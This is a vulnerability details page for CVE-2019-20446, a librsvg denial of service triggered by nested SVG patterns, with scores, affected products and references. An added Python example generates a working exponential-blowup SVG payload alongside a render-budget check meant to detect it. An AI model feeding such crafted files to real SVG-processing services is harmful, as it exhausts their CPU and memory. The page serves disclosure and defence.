Vulnerability Details : CVE-2019-20446
In xml.rs in GNOME librsvg before 2.46.2, a crafted SVG file with nested patterns can cause a denial of service when passed to the library for processing. The attacker constructs pattern elements that reference one another so that the number of objects finally rendered grows exponentially with the nesting depth, exhausting CPU time and memory.
Vulnerability category: Denial of service
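To make the resource-exhaustion mechanism concrete, the following added example (not part of this page, the NVD record, or the librsvg code base) builds an SVG of the shape the description refers to and counts how many leaf objects a renderer that naively expands every pattern reference would draw. Pattern `p0` holds `fanout` plain rectangles, each pattern `p_i` holds `fanout` rectangles filled with `url(#p_{i-1})`, and one top-level rectangle is filled with the deepest pattern, so the count is `fanout ** (depth + 1)`. The counter also enforces a hypothetical render budget and aborts once it is exceeded; the budget value, the element names and the helper functions are assumptions chosen for illustration, not librsvg's actual fix. Real pattern tiling multiplies the count further, so this is a lower bound.

```python
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"


def build_nested_pattern_svg(depth: int, fanout: int) -> str:
    """Construct (for illustration) an SVG whose patterns nest `depth` levels deep.

    p0 contains `fanout` plain rects; p_i contains `fanout` rects filled with
    p_{i-1}; the visible top-level rect is filled with p_depth.
    """
    parts = [f'<svg xmlns="{SVG_NS}" width="100" height="100"><defs>']
    for i in range(depth + 1):
        fill = "black" if i == 0 else f"url(#p{i - 1})"
        rects = "".join(
            f'<rect width="5" height="5" fill="{fill}"/>' for _ in range(fanout)
        )
        parts.append(
            f'<pattern id="p{i}" width="10" height="10" '
            f'patternUnits="userSpaceOnUse">{rects}</pattern>'
        )
    parts.append(f'</defs><rect width="100" height="100" fill="url(#p{depth})"/></svg>')
    return "".join(parts)


class RenderBudgetExceeded(Exception):
    """Raised when expanding the document would draw more objects than allowed."""


def count_rendered_objects(svg_text: str, budget: int) -> int:
    """Count leaf objects a naive renderer would draw, aborting past `budget`.

    Each rect whose fill is url(#id) is expanded into the children of pattern
    `id` (one object per child per reference); anything else counts as one
    drawn object. Cyclic references are skipped so the walk terminates.
    """
    root = ET.fromstring(svg_text)
    patterns = {el.get("id"): el for el in root.iter(f"{{{SVG_NS}}}pattern")}
    total = 0

    def render(el, active_refs):
        nonlocal total
        fill = el.get("fill", "")
        if fill.startswith("url(#") and fill.endswith(")"):
            ref = fill[5:-1]
            pattern = patterns.get(ref)
            if pattern is None or ref in active_refs:
                return  # dangling or cyclic reference: nothing further to draw
            for child in pattern:
                render(child, active_refs | {ref})
        else:
            total += 1
            if total > budget:
                raise RenderBudgetExceeded(f"more than {budget} objects")

    defs = root.find(f"{{{SVG_NS}}}defs")
    for el in root:
        if el is not defs:  # <defs> content is only drawn when referenced
            render(el, frozenset())
    return total


def exceeds_budget(svg_text: str, budget: int) -> bool:
    """True if rendering `svg_text` would exceed `budget` objects."""
    try:
        count_rendered_objects(svg_text, budget)
    except RenderBudgetExceeded:
        return True
    return False


if __name__ == "__main__":
    # A 1.4 KB file with depth 9 and fan-out 4 expands to 4**10 = 1,048,576 objects.
    payload = build_nested_pattern_svg(depth=9, fanout=4)
    print(len(payload), "bytes ->", 4 ** 10, "objects if rendered naively")
    print("exceeds hypothetical 500,000-object budget:", exceeds_budget(payload, 500_000))
```

The asymmetry is the whole attack: the file grows linearly in `depth` while the rendering work grows as `fanout ** (depth + 1)`. A pre-render budget like the one above (or an equivalent cap on reference depth) is the kind of check a consumer of untrusted SVG should expect from the library, and a cheap way to test whether a deployed build still expands such inputs without limit.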
Products affected by CVE-2019-20446
- cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*
- cpe:2.3:a:gnome:librsvg:*:*:*:*:*:*:*:*
- cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*
- cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*
- cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*
- cpe:2.3:o:fedoraproject:fedora:30:*:*:*:*:*:*:*
- cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*
- cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:vmware_vsphere:*:*
Exploit prediction scoring system (EPSS) score for CVE-2019-20446
- EPSS score: 0.39% (probability of exploitation activity in the next 30 days)
- EPSS percentile: ~73% (proportion of vulnerabilities scored at or below this one)
CVSS scores for CVE-2019-20446
Base Score | Base Severity | CVSS Vector | Exploitability Score | Impact Score | Score Source | First Seen |
---|---|---|---|---|---|---|
4.3 | MEDIUM | AV:N/AC:M/Au:N/C:N/I:N/A:P | 8.6 | 2.9 | NIST | |
6.5 | MEDIUM | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H | 2.8 | 3.6 | NIST | |
CWE ids for CVE-2019-20446
- The product does not properly control the allocation and maintenance of a limited resource, thereby enabling an actor to influence the amount of resources consumed, eventually leading to the exhaustion of available resources. Assigned by: nvd@nist.gov (Primary)
References for CVE-2019-20446
- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6IOHSO6BUKC6I66J5PZOMAGFVJ66ZS57/
  [SECURITY] Fedora 30 Update: chromium-80.0.3987.149-1.fc30 (Fedora package-announce). Mailing List; Third Party Advisory
- https://gitlab.gnome.org/GNOME/librsvg/issues/515
  DoS vulnerability in librsvg (#515), GNOME / librsvg issue tracker. Vendor Advisory
- http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00024.html
  [security-announce] openSUSE-SU-2020:0343-1: moderate: Security update f. Mailing List; Third Party Advisory
- https://security.netapp.com/advisory/ntap-20221111-0004/
  CVE-2019-20446 GNOME Librsvg Vulnerability in NetApp Products (NetApp Product Security). Third Party Advisory
- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/X3B5RWJQD5LA45MYLLR55KZJOJ5NVZGP/
  [SECURITY] Fedora 31 Update: chromium-80.0.3987.132-1.fc31 (Fedora package-announce). Mailing List; Third Party Advisory
- https://usn.ubuntu.com/4436-1/
  USN-4436-1: librsvg vulnerabilities (Ubuntu security notices). Third Party Advisory
- https://lists.debian.org/debian-lts-announce/2020/07/msg00016.html
  [SECURITY] [DLA 2285-1] librsvg security update. Mailing List; Third Party Advisory